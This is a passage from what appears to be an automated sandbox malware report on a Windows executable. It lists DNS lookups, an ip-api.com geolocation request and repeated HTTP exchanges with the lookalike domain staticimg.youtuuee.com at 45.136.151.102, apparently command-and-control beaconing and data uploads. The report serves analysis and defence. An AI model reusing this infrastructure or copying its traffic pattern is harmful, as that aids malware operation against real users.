45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:53.489969015 CEST

8.8.8.8 192.168.2.5 0xf293 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Copyright Joe Security LLC 2021 Page 23 of 58

Page 24: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:47:54.106935024 CEST

8.8.8.8 192.168.2.5 0x69a3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:54.737811089 CEST

8.8.8.8 192.168.2.5 0x4eac No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:55.344943047 CEST

8.8.8.8 192.168.2.5 0xe83f No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:55.972354889 CEST

8.8.8.8 192.168.2.5 0xcc66 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:56.577006102 CEST

8.8.8.8 192.168.2.5 0xb24f No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:57.207375050 CEST

8.8.8.8 192.168.2.5 0xff No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:57.836489916 CEST

8.8.8.8 192.168.2.5 0xdca No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:58.454911947 CEST

8.8.8.8 192.168.2.5 0xcdaa No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:59.077966928 CEST

8.8.8.8 192.168.2.5 0x6f1c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:59.675107002 CEST

8.8.8.8 192.168.2.5 0xcd41 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:48:00.280102015 CEST

8.8.8.8 192.168.2.5 0x7608 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:48:00.895539045 CEST

8.8.8.8 192.168.2.5 0x825b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:48:01.503696918 CEST

8.8.8.8 192.168.2.5 0xcc3a No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:48:02.130254984 CEST

8.8.8.8 192.168.2.5 0x95a No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

ip-api.com

staticimg.youtuuee.com

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.2.5 49735 208.95.112.1 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:12.018076897 CEST

649 OUT GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com

HTTP Request Dependency Graph

HTTP Packets

Copyright Joe Security LLC 2021 Page 24 of 58

Page 25: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:12.047775030 CEST

690 IN HTTP/1.1 200 OKDate: Sun, 24 Oct 2021 07:46:11 GMTContent-Type: application/json; charset=utf-8Content-Length: 294Access-Control-Allow-Origin: *X-Ttl: 53X-Rl: 42Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 31 22 2c 22 6c 61 74 22 3a 34 37 2e 31 39 33 37 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 32 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6331","lat":47.1937,"lon":8.4202,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.33"}

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

1 192.168.2.5 49740 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:12.621711016 CEST

808 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:12.769849062 CEST

946 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 4b 44 41 7a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149215,"time":1635061572,"rand_str":"FhKDAz"}0

Oct 24, 2021 09:46:12.923156023 CEST

1149 OUT POST /api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:13.082741976 CEST

1150 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 32 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 22{"status":2,"ip":"102.129.143.33"}0

Session ID Source IP Source Port Destination IP Destination Port Process

10 192.168.2.5 49758 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:24.059860945 CEST

1341 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 25 of 58

Page 26: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:24.206494093 CEST

1341 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 37 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 32 67 46 6d 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149773,"time":1635061584,"rand_str":"32gFmU"}0

Oct 24, 2021 09:46:24.325861931 CEST

1342 OUT POST /api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:24.523351908 CEST

1342 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

100 192.168.2.5 49888 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

101 192.168.2.5 49889 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

102 192.168.2.5 49890 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

103 192.168.2.5 49891 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

104 192.168.2.5 49892 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

105 192.168.2.5 49893 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 26 of 58

Page 27: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

106 192.168.2.5 49894 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

107 192.168.2.5 49895 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

108 192.168.2.5 49896 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

109 192.168.2.5 49897 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

11 192.168.2.5 49760 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:25.600858927 CEST

1343 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:25.747248888 CEST

1344 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 38 34 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 41 77 4a 45 50 6e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149847,"time":1635061585,"rand_str":"AwJEPn"}0

Oct 24, 2021 09:46:25.915107965 CEST

1344 OUT POST /api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:26.070641041 CEST

1345 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

110 192.168.2.5 49898 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 27 of 58

Page 28: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

111 192.168.2.5 49899 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

112 192.168.2.5 49900 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

113 192.168.2.5 49901 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

114 192.168.2.5 49902 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

115 192.168.2.5 49903 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

116 192.168.2.5 49904 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

117 192.168.2.5 49905 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

118 192.168.2.5 49906 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

119 192.168.2.5 49907 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

12 192.168.2.5 49763 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Copyright Joe Security LLC 2021 Page 28 of 58

Page 29: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:27.121689081 CEST

1351 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:27.268641949 CEST

1354 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 39 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 38 46 47 56 70 59 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149915,"time":1635061587,"rand_str":"8FGVpY"}0

Oct 24, 2021 09:46:27.453737020 CEST

1355 OUT POST /api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:27.604629040 CEST

1355 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

120 192.168.2.5 49908 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

121 192.168.2.5 49909 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

122 192.168.2.5 49910 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

123 192.168.2.5 49911 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

124 192.168.2.5 49912 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

125 192.168.2.5 49913 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Copyright Joe Security LLC 2021 Page 29 of 58

Page 30: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

126 192.168.2.5 49914 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

127 192.168.2.5 49916 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

128 192.168.2.5 49917 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

129 192.168.2.5 49918 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

13 192.168.2.5 49765 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:28.760766983 CEST

1356 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:28.905373096 CEST

1357 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 56 52 34 58 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150019,"time":1635061588,"rand_str":"3VR4XU"}0

Oct 24, 2021 09:46:29.133558035 CEST

1357 OUT POST /api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:29.287159920 CEST

1358 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

130 192.168.2.5 49920 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Copyright Joe Security LLC 2021 Page 30 of 58

Page 31: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

131 192.168.2.5 49923 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

132 192.168.2.5 49924 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

133 192.168.2.5 49925 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

134 192.168.2.5 49926 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

135 192.168.2.5 49927 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

136 192.168.2.5 49928 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

137 192.168.2.5 49929 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

138 192.168.2.5 49930 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

139 192.168.2.5 49931 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 31 of 58

Page 32: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

14 192.168.2.5 49766 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:30.222265005 CEST

1359 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:30.368000984 CEST

1359 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 39 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 61 78 65 7a 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150093,"time":1635061590,"rand_str":"Paxezy"}0

Oct 24, 2021 09:46:30.462079048 CEST

1359 OUT POST /api/?sid=2150093&key=6e5de35b796142fbcf8f6d325b040018 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:30.613193035 CEST

1360 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

140 192.168.2.5 49932 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

141 192.168.2.5 49933 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

142 192.168.2.5 49934 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

143 192.168.2.5 49935 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

144 192.168.2.5 49936 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 32 of 58

Page 33: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

145 192.168.2.5 49937 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

15 192.168.2.5 49767 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:31.909816980 CEST

1361 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:32.101710081 CEST

1361 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 31 38 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 67 4e 64 65 43 43 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150187,"time":1635061591,"rand_str":"gNdeCC"}0

Oct 24, 2021 09:46:32.287842035 CEST

1362 OUT POST /api/?sid=2150187&key=58eda2f16bea8597906a0c39546b4751 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:32.440355062 CEST

